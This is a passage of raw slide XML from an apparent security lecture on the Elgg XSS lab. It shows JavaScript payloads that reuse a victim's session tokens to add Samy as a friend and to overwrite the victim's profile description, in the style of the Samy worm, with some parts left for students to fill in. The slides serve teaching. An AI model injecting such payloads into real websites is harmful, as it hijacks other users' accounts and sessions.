            <a:solidFill>
              <a:srgbClr val="00F8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30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19B89166-A198-ED87-A1B2-061CFF3CEAE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="130555" y="3714750"/>
            <a:ext cx="2077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right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click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view page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source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1" name="object 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42A3C63D-225B-1F50-59A2-64496D9F8AB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="231140" y="4834827"/>
            <a:ext cx="5005070" cy="192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3117850" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>e":"en"},"security":{"token":{"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elgg_ts":1666291</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial MT"/>
              <a:cs typeface="Arial MT"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="26034">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="789940" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>176,"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elgg_token":"Tj5yRreQxu_KodmagyT6Iw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"}},"session":{"user":{"guid":56,"type":"user","subt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ype":"user","owner_guid":56,"container_guid":0,"t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ime_created":"2020-04-26T15:21:41-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04:00","time_updated":"2020-04-26T15:21:41-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04:00","url":"http:\/\/www.xsslabelgg.com\/profile\/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2" name="object 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6018C8AF-C937-0B1B-D99F-4008F209420A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7110730" y="5733708"/>
            <a:ext cx="364236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Input Headers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need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provide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F4847A-684E-BD6F-7449-E121F6516B65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11644962" y="648566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31589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AA7D1-0251-4F27-9494-8C7AD82F90FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1129453"/>
            <a:ext cx="3962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Lab 4 (SQL injections) Due Sunday @ 11:59 PM</a:t>
            </a:r>
          </a:p>
          <a:p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6" name="Picture 2" descr="sql injection : r/ProgrammerHumor">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57CBE864-AF7F-3961-7870-446706EFE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2" y="471226"/>
            <a:ext cx="4732603" cy="5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A3678B-B1B3-294F-527C-E3081FB5FF94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="31242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Cybersecurity Capture the Flag (CTF) group is competing in a competition this weekend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DM me if you are interested in learning more</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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1F12F0E-81C0-9547-AC0B-9AECB03CCA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6334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Becoming</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="20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Victim’s</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>friend</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>through XSS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9C9C5348-214B-30CC-B010-DA5EF2D4AF5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="990600"/>
            <a:ext cx="11902440" cy="5355590"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11902440" h="5355590">
                <a:moveTo>
                  <a:pt x="0" y="5355336"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11902440" y="5355336"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11902440" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="535533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18D0B2A-C503-B23F-E007-FC7AB134A1B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="154939" y="996441"/>
            <a:ext cx="848995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3735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&lt;script type="text/javascript"&gt;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window.onload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function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()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var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Ajax=null;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286385" marR="123380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//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Set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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="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timestamp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and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secret</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="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token</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="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parameters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var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ts</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>="&amp;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sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>elgg_ts="+elgg.security.token.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" u="sng" spc="105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elgg_ts;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var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token</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>="&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" u="sng" spc="105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elgg_token="+elgg.security.token.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" u="sng" spc="107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elgg_token;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//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Construct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HTTP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request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to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add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Samy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(59)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friend.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6ED7605-8945-C7A6-C63D-9D2C0D929D88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429259" y="3465398"/>
            <a:ext cx="8078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var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sendurl=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"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" spc="-10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.xsslabelgg.com/action/friends/add?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068F44F1-EA91-C7AB-16FE-B56B633390F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8493252" y="3520440"/>
            <a:ext cx="3275329" cy="25907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332740">
              <a:lnSpc>
                <a:spcPts val="1960"/>
              </a:lnSpc>
            </a:pP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(You</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b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FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1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figure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1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8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out)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1C9C6B90-BA32-5D47-6A80-B268CFFAEC9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9588373" y="38609"/>
            <a:ext cx="2443480" cy="923925"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2443479" h="923925">
                <a:moveTo>
                  <a:pt x="0" y="923544"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2442972" y="923544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2442972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E0CDDD8B-E731-AA5F-487F-9C7212163E3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9736963" y="132334"/>
            <a:ext cx="2146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This is </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" i="1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the script </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" i="1" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>you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going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inject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on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lang="en-US" sz="1800" i="1" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Samy’s 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profile!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1E0E5649-5DBC-B716-5D46-DAC9280A1A78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="154939" y="4014596"/>
            <a:ext cx="11960225" cy="28366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4704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// Create and send Ajax request </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>add friend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Ajax=new XMLHttpRequest();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Ajax.open("GET",sendurl,true);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Ajax.setRequestHeader("Host","</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>www.xsslabelgg.com</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
            <a:endParaRPr sz="1800" dirty="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Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");</a:t>
            </a:r>
            <a:endParaRPr sz="1800" dirty="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Ajax.send();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&lt;/script&gt;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 dirty="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312186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E11F5F2E-6067-D726-A1BF-D606ED23A8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6113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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Injection to</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>edit someone's</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>profile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170A7534-C873-7EFE-C399-8EBB59D95237}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="180238" y="560577"/>
            <a:ext cx="8710930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635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&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>type="text/javascript"&gt;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window.onload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function(){</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Arial MT"/>
              <a:cs typeface="Arial MT"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="210820" marR="5080">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="5432425" algn="l"/>
                <a:tab pos="7827009" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>//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Ja</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>aScript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code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access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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>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nam</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-15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gui</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>d,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i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p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r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>elgg_ts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Security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oken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r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>elgg_t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-15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n  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>var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name</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>="&amp;name="+elgg.session.user.name;</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Arial MT"/>
              <a:cs typeface="Arial MT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var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guid</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>="&amp;guid="+elgg.session.user.guid;</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Arial MT"/>
              <a:cs typeface="Arial MT"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="210820">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="1148080" algn="l"/>
                <a:tab pos="3714750" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>var </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ts</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>="&amp;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400" spc="-5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>elgg_ts="+elgg.security.token.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400" spc="-5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>elgg_ts;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F6619C0D-9FA0-CDC3-13B3-009945ACA257}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="378663" y="1840738"/>
            <a:ext cx="505650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64920" algn="l"/>
                <a:tab pos="4125595" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>var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token</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>="&amp;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400" spc="-5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>elgg_token="+elgg.security.token.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400" spc="-5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>elgg_token;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var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desc</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>="&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>description=Samy</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" b="1" spc="-4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2D050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" b="1" spc="-2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2D050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>my</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" b="1" spc="-2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2D050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>hero</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>"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endParaRPr sz="1400">
              <a:latin typeface="Arial MT"/>
              <a:cs typeface="Arial MT"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="454659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"&amp;accesslevel[description]=2";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32B639F5-4481-D300-47FF-B140DFCE08DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="378663" y="2694558"/>
            <a:ext cx="459486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//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Construct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url.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var </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>sendurl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http://www.xsslabelgg.com/action/profile/edit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1C131455-15CB-BB3F-9BB0-E2B652224D8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="378663" y="3334638"/>
            <a:ext cx="37712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//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Construct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content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request.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var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content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token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name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desc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guid</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0"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BD11B89F-B102-202E-C33F-8524677EEFD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3691730" y="4401692"/>
            <a:ext cx="3911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//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(1)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2FC7AF7D-5694-B34B-47BA-B1471010623F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="378663" y="3974972"/>
            <a:ext cx="299910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370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//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HTTP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request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samyGuid=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???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;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//FILL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if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(elgg.session.user.guid!=samyGuid)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4A81C39D-7EEB-9807-D0B2-4DBD31F1CC3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="575259" y="4828413"/>
            <a:ext cx="439610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//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Create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Ajax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request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modify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profile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var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Ajax=null;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Ajax=new XMLHttpRequest();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Ajax.open("POST",sendurl,true);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Ajax.setRequestHeader("Host","</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>www.xsslabelgg.com</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>");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44E44730-CDCA-432B-A526-0DA5F8D8D1DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="378663" y="5895543"/>
            <a:ext cx="647065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Ajax.setRequestHeader("Content-Type",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"application/x-www-form-urlencoded");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Ajax.send(content);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38FDA1FD-F48B-C5FB-F2B8-274444B92EEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="180238" y="6535623"/>
            <a:ext cx="8197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}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&lt;/script&gt;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13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{393EE1C6-0527-93CD-9E55-898B6EAD5257}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3886200" y="2259964"/>
            <a:ext cx="2973070" cy="489584"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2973070" h="489585">
                <a:moveTo>
                  <a:pt x="76282" y="31391"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="74352" y="43833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2970783" y="489458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2972816" y="477012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76282" y="31391"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2973070" h="489585">
                <a:moveTo>
                  <a:pt x="81152" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="26035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69469" y="75311"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74352" y="43833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61849" y="41910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63753" y="29463"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76581" y="29463"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81152" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2973070" h="489585">
                <a:moveTo>
                  <a:pt x="63753" y="29463"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="61849" y="41910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74352" y="43833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76282" y="31391"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63753" y="29463"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2973070" h="489585">
                <a:moveTo>
                  <a:pt x="76581" y="29463"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="63753" y="29463"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76282" y="31391"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76581" y="2946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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C7931E5-C075-6B8F-0F38-C0B944782DDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7013829" y="2542159"/>
            <a:ext cx="4772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injecting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someone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else’s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15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A75841C6-2A87-6619-BF03-9CA1EDB5C3E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7013829" y="2816478"/>
            <a:ext cx="1765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about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section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16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70C7D08C-0C1A-76D0-DEE6-FFCDA4CDCFB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4114800" y="1391285"/>
            <a:ext cx="2973070" cy="489584"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2973070" h="489585">
                <a:moveTo>
                  <a:pt x="76282" y="31391"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="74352" y="43833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2970783" y="489457"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2972816" y="477012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76282" y="31391"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2973070" h="489585">
                <a:moveTo>
                  <a:pt x="81152" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="26035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69469" y="75311"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74352" y="43833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61849" y="41910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63753" y="29463"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76581" y="29463"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81152" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2973070" h="489585">
                <a:moveTo>
                  <a:pt x="63753" y="29463"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="61849" y="41910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74352" y="43833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76282" y="31391"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63753" y="29463"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2973070" h="489585">
                <a:moveTo>
